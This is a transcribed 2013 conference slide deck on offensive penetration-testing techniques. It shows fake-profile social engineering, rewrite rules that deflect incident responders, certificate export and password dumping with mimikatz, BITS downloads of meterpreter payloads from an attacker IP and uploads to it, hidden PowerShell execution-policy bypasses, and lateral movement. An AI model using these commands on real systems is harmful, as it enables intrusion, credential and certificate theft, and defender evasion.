SlideShare a Scribd company logo

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2

Chris Gates
Chris Gates

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2

Technology
1 of 121
Velkommen!
Whoami • Mubix “Rob” Fuller – mubix@metasploit.com – @mubix – room362.com – Co-Founder of NoVA Hackers • Previous Talks – Dirty Little Secrets – Networking for PenTesters – Metasploit Mastery – Deep Magic 101 – Couch to Career
Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – NoVAHackers • Previous Talks – ColdFusion for Pentesters – From LOW to PWNED – Dirty Little Secrets 1 & 2 – Attacking Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
Agenda • Putting in the hours on LinkedIn for SE • Giving IR teams a run for their money • Stealing certs • Become the proxy • Mimikatz with Metasploit • New Incognito && Netview release • Ditto • 10 ways to PSEXEC • Why doesn’t SYSTEM have proxy settings!?! • Windows is my backdoor (bitsadmin, powershell, wmi ) • WebDAV server via metasploit • Turning your External Pentest into an Internal one
The setup… We like to use LinkedIn for OSINT but how can we do it better?
Becoming a LiON • Why? • API is based on YOUR connections • 2nd == full names • 3rd level connections count but show more on Linkedin.com vs API • Creating a fake account • Connecting with Recruiters ++ • Connecting with “Open Networkers”
2nd level connections to Obamz
LinkedIn API • URL: https://developer.linkedin.com • Allows you to query information – Company info – Groups – Name about your 1st & 2nd order connections
Big Ass LinkedIn Network • Meet “John” • John has been busy being awesome on LinkedIn for the last few months
LinkedIn API • Limited by YOUR connections and network reach • API gives you NO info about 3rd order connections • Usually you’ll see more info via the web on 3rd order people • The total number of search results possible for any search will vary depending on the user's account level.
LinkedIn API • An example (Palantir) CG vs. John
LinkedIn API • An example (Pfizer) CG vs. John
LinkedIn API • An example (Bank of America) CG vs. John
More LinkedIn • Turning an email list into validated LinkedIn Contacts/emails • Import them!
More LinkedIn • Get some emails
More LinkedIn • Import them! • Need them in a specific format though. – Ruby to the rescue
More LinkedIn • Get some ruby
More LinkedIn • Get some contacts
More LinkedIn • Import and do your thing
The setup… IR teams F**k up all my hard work preparing phishing attacks
Phishing and F**king with IR Teams • Thanks to people like SANS organizations have a standardized, repeatable, process  – What’s not to like? – Submit to the sandbox – Submit to the malware lookup site – I feel safe! • But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
Phishing and F**king with IR Teams • What you *could* do… – Build a phish that EVERYONE will report – Capture the IR process via log/scan/analyst activity • This gives you intel on: – Which services are contracted out for analysis • And their IPs – Are humans in the mix • And their IPs – Level of sophistication
Phishing and F**king with IR Teams • Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site. • How?
Phishing and F**king with IR Teams • Apache and mod-rewrite is an option RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^$ [OR] RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|load er|email|nikto|miner|python|wget|Wget).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww- perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR] RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside IR RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR] #googlebot RewriteCond %{REMOTE_ADDR} ^88.88. [OR] RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
The setup… I want to find and steal code signing certificates from victims
Stealing Certificates • Why? • Have you tried to get/buy one? It’s a pain in the ass. – I see why people just steal them • Impact – Sign code as the company – Now your code may be *more* trusted by the victim…or at least less suspicious (ask Bit9) – Can you steal their wildcard SSL cert?
Stealing Certificates • If you export one, it has to have a password  • However, if YOU export it, YOU can set the password. • You can do this all on the command line – Use mozilla’s certutil • http://www.mozilla.org/projects/security/pki/nss/tools /certutil.html – Use Mimikatz 
Stealing Certificates • Mozilla certutil • Compile your own, or download precompiled bins certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def ault-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u <------- code signer Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip--
Stealing Certificates • Mozilla certutil • -L List all the certificates, or display information about a named certificate, in a certificate database. certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul t-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip • “u”  Certificate can be used for authentication or signing  • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
Stealing Certificates • Mozilla pk12util.exe • To extract the cert: C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe - n "Verified Publisher LLC's COMODO CA Limited ID" -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh wru.default-1339854577637 -o test2.p12 -W mypassword1 • http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
Stealing Certificates Via MimiKatz (list certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘ Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit
Stealing Certificates Via MimiKatz (export certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK mimikatz(commandline) # exit
The setup… Ok… so we can steal their certificates what if we wanted to give them some of our own. ::evilgrin::
Set up burp, get PortSwiggerCA
Inject CA
Set proxy
You know what happens next…
Side note… • Have to be “Admin” to do it  • This injects a Certificate Authority cert which means you can: – MITM HTTPS traffic (as demoed) – Use for 2nd stage phish or persistence – Issue code signing certs from your CA… • CAVEAT: There is a “remove_ca” module. Please don’t leave your clients with an extra CA in their certificate stores.. ;-)
The setup… Mimikatz is awesome and I want to execute it without putting bins on the box
Mimikatz gives me clear text passwords?
So does WCE!
Mimikatz • Mimikatz detected by AV • Sekurlsa.dll detected by AV • WCE detected by AV • WCE IN MEMORY! (kinda) Stop submitting $#!+ to Virus Total!
Mimikatz • New version (6 Sep 12) supports in-memory • execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Sessiondump and Mimikatz Alpha 1. Dump lsass process memory from any system 2. Run mimikatz against dump 3. Open hat and collect free passwords
The setup… Finding domain admin users is hard Incognito is awesome and I want to show/leverage the new features
New Incognito (find_token) C:>find_token.exe usage: find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
New Incognito (find_token) C:>find_token.exe dc1 [*] Scanning for logged on users... Server Name Username ------------------------------------------------------ dc1 PROJECTMENTORjdoe dc1 PROJECTMENTORjdoe
NETVIEW.exe (not ‘net view’)
NETVIEW C:Documents and SettingsuserDesktop>netview Netviewer Help -------------------------------------------------------------------- -d domain : Specifies a domain to pull a list of hosts from uses current domain if none specified -f filename.txt : Speficies a file to pull a list of hosts from -o filename.txt : Out to file instead of STDOUT
Release of NETVIEW C:Documents and SettingsuserDesktop>netview -d [*] -d used without domain specifed - using current domain [+] Number of hosts: 3 [+] Host: DC1 Enumerating AD Info [+] DC1 - Comment - [+] DC1 - OS Version - 6.1 [+] DC1 - Domain Controller Enumerating IP Info [+] DC1 - IPv4 Address - 172.16.10.10 Enumerating Share Info [+] DC1 - Share - ADMIN$ Remote Admin [+] DC1 - Share - C$ Default share [+] DC1 - Share - IPC$ Remote IPC [+] DC1 - Share - NETLOGON Logon server share [+] DC1 - Share - SYSVOL Logon server share Enumerating Session Info [+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] Host: WIN7X64 Enumerating AD Info [+] WIN7X64 - Comment - [+] WIN7X64 - OS Version - 6.1 Enumerating IP Info [+] WIN7X64 - IPv4 Address - 172.16.10.216 Enumerating Share Info [+] WIN7X64 - Share - ADMIN$ Remote Admin [+] WIN7X64 - Share - C$ Default share [+] WIN7X64 - Share - IPC$ Remote IPC Enumerating Session Info [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users
Release of NETVIEW AND IT’S ALREADY ON GITHUB:
New features since last year… • Can now do LDAP to find hosts all the hosts in a domain, not just the ones your victim can see • Restricts the results from LDAP down to just computers that have been active in the last 90 days • Lists local user accounts for each system to include their description. Watch Eric’s talk later to see why this is important.
The setup… Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
this:
Meet ‘DITTO’
He does something really well…
And it’s not just the icon…
Yes, it’s already on Github too
The setup… Who doesn’t want more ways to psexec??!!!
10 ways to PSEXEC
Sysinternal PSEXEC POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password • Leaves PSEXESVC running • Have to touch disk if not present already
Metasploit PSEXEC POSITIVES • Supports the use of Hashes NEGATIVES • Some AVs flag service binary due to injection techniques used within • Rundll32.exe is running
Metasploit PSEXEC-MOF POSITIVES • Drop a file and Windows automatically runs it. (MAGIC!) NEGATIVES • XP and below – (only because Metasploit doesn’t automatically compile MOFs) • ADMIN$ required – (Unless you make code edits)
Metasploit PSEXEC-As-User POSITIVES • Executes as the current user • No need for passwords or hashes • Also a great way to bypass UAC.. But more on that later NEGATIVES • Some AVs flag service binary due to injection techniques used within • Rundll32.exe is running
WMI POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password
Powershell POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password
RemCom POSITIVES • Open source psexec • You can add Pass-The- Hash – (open source an all) NEGATIVES • Binary, so again, can’t go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
Winexe POSITIVES • Open source psexec • Supports Pass-The-Hash NEGATIVES • Binary, so again, can’t go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
smbexec POSITIVES • Open source psexec • Supports Pass-The-Hash NEGATIVES • Binary – (but designed with shoveling over Metasploit in mind) http://sourceforge.net/projects/smbexec/
Pass the hash for 15 years stuff here • Firefox • smbclient • smbmount • Rpcclient • http://passing-the-hash.blogspot.com/
Zfasel’s stuff here • If it ever gets released works ;-) LOVE YOU FASEL!! Go see his talk, it works now… maybe…
Python && impacket • http://code.google.com/p/impacket/ • PTH support for SMB/MSSQL/
WinRM (‘new’ hotness) POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password
Do you look for 5985 internally on your pen tests? we would suggest it ;-) src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
Victim: winrm quickconfig –q Attacker: winrm quickconfig -q winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”} Yes.. That’s right, THE ATTACKER says which hosts to trust… Sooooo much fun to be had! Oh, and did I mention it’s completely interactive? (You can enter password questions)
WinRM is an HTTP services that looks for requests to the URL /wsman. A system that is doing so on port 80… on the Internet… in the Alexa Top 1 million… is sorta like listening on 445… just sayin…
Metasploit PSEXEC-WinRM POSITIVES • Never going to be on any AV list • Uses powershell if possible • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password – (or do you?)
Build your own pyBear • PySMB supports auth with using hashes • Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working • Compile your own psexec with hash support • ;-) • Impacket (again)
Build your own Bear.rb • Metasploit’s Rex library – already has the hash passing goodness – HDM committed a stand-alone version of PSEXEC on September 5th 2012
The setup… UAC sucks… bypassing only takes 2 things…
The setup… If you’re an admin and UAC is stopping you…
Find a network with more than one Windows box…
The setup… Why doesn’t SYSTEM have proxy settings !?!
• If OS !> Vista – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit) • WINDOWS/EXEC (or any of the other psexec methods we just talked about) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM /MANUAL_PROXY 192.168.5.100:3128 “;” – After your done use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY • Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
NETSH & ProxyCFG • Sets the WinHTTP proxy – Not Windows’ proxy settings, only is used if the program uses WinHTTP • XP – proxycfg –p 192.168.92.100:3128 – or – proxycfg –u (pulls it from IE) • Vista+ – netsh winhttp set proxy 192.168.92.100:3128 – or – netsh winhttp import proxy ie
REGISTRY Poking • HKLMSoftwarePoliciesMicrosoftWindows CurrentVersionInternet Settings • ProxySettingsPerUser [DWORD] • Set to 0 for settings are System Wide • Set to 1 for settgings are Per User
Registry Poking • Uses the DefaultConnectionSettings binary registry key. • Remote and/or different user setting
The setup… Neat binaries that do backdoor/RAT behavior that are already there for us.
Windows is my backdoor BITS “BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.” http://technet.microsoft.com/en-us/library/dd819415.aspx
Windows is my backdoor BITS There are three types of BITS transfer jobs: - A download job downloads files to the client computer. - An upload job uploads a file to the server. - An upload-reply job uploads a file to the server and receives a reply file from the server application.
Windows is my backdoor BITS (How-To) • Set the server side up (HTTP, not standard setup) – Google • Uses powershell to upload/download import BITS PS C:Userscg>Import-Module BitsTransfer Download files over BITS PS C:Userscg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:UserscgDesktopmeterpdownload443.exe
Windows is my backdoor BITS (How-To) Upload files over BITS PS C:Userscg> Start-BitsTransfer -Source C:UserscgDesktopfile2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -transfertype upload
Windows is my backdoor BITS over Wireshark
Windows is my backdoor • Powershell • OMG Powershell!
Windows is my backdoor • Powershell
Windows is my backdoor • PowerShell – Does A LOT! – Check out Exploit Monday and PowerSploit – Chris @ ObscureSec – Carlos Perez has had lots of PowerShell blog posts – I haven't found a meterpreter feature that cant be done with PowerShell
Windows is my backdoor • Powershell cool examples – Powershell hashdump (in SET) – Poweshell exec method in MSSQL_Payload – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
Windows is my backdoor • Powershell cool examples • Port Scanner: PS C:> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null 25 is open • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor • Powershell cool examples • Port Sweeper PS C:> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null 10.1.1.5 • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor • Powershell cool examples • Bypass execution policy – Dave Kennedy talked about this at defcon 18 – Requires PowerShell v2.0 or above – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden - File "C:do_neat_ps_shit.ps1"
Windows is my backdoor • CreateCMD stuff from Dave Kennedy • In SET • Pshexec by Carlos Perez • https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb • B64 encodes the command so you can pass via meterp or in another script • powershell -noexit –EncodedCommand [b64enc BLOB]
Windows is my backdoor • Metasploit to generate PowerShell • Uses old powersploit technique
Windows is my backdoor • How to run PowerShell from Meterpreter – Use a bat file C:>type run_ps.bat powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1 Example: meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat' Process 28536 created. meterpreter > [*] 4.5.6.21:3863 Request received for /vLNL... [*] 4.5.6.21:3863 Staging connection for target /vLNL received... --snip-- [*] Patched Communication Timeout at offset 653608... [*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
The setup… A webdav server to download files from. Why? Because we can.
MSF WebDAV server
MSF WebDAV server • net use ip:portdocuments /User:Guest • copy ip:portdocumentsmyexe.exe myexe.exe • Available on github: • https://github.com/carnal0wnage/Metasploit- Code/blob/master/modules/exploits/webdav_file_server.rb
MSF WebDAV server msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents [*] 192.168.26.1:17870 PROPFIND => 301 (/documents) [*] 192.168.26.1:17870 PROPFIND /documents/ [*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/) [*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory [*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
The Setup… LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
While we are on the subject… Does anyone know what happens when you try to access a share on a windows box that doesn’t exist from another windows box?? I want to access SHARE3 I don’t have SHARE3 Is that it?
nope (if webclient service is started – Vista+ manual start) I want to access SHARE3 I don’t have SHARE3 on SMB I want to access SHARE3 over WebDAV If you are following along at home, windows is always (unless disabled) listening on Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
On-target NBNS Spoofing FakeNetbiosNS FTW!
Meet the Microsoft Windows Firewall “PORTPROXY” feature Basically it’s port-forwarding but can do so for: IPv4 -> IPv4 IPv6 -> IPv4 IPv6 -> IPv6 IPv4 -> IPv6 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
Now convince/cause someone to connect to a fake share on VICTIM1…
weeeeeeeeeeeeee • *] 50.50.50.50 http_ntlm - Request '/share3/test.png'... • [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000 • NTLMv2 Response Captured from WIN7X86 • DOMAIN: PROJECTMENTOR USER: jadmin • LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled • NTHASH:9eed2162b1c7424780204fb9ced5bc1a NT_CLIENT_CHALLENGE:0101000000000000067a01b4 b097cd01c77c09ccedbfc55d0000000002001a0070007 2006f006a006500630074006d0065006e0074006f0072 000000000000000000
why 1. Give me SHARE3! 5. OK, you are in my Intranet, AUTHAUTH 2. Portproxy! 6. AUTOAUTH! 3. AUTH! 7. kthxbai! 4. AUTH! via portpoxy And yes, SMB_Relay works just fine if you have a route set up over your meterpreter shell of the connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
Respectfully refrained from any Inside->Out Google images. You’re welcome.
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2

Recommended

Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 

Recommended

Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointAndrew McNicol
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010Chris Gates
 

More Related Content

What's hot

Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
External to DA, the OS X Way
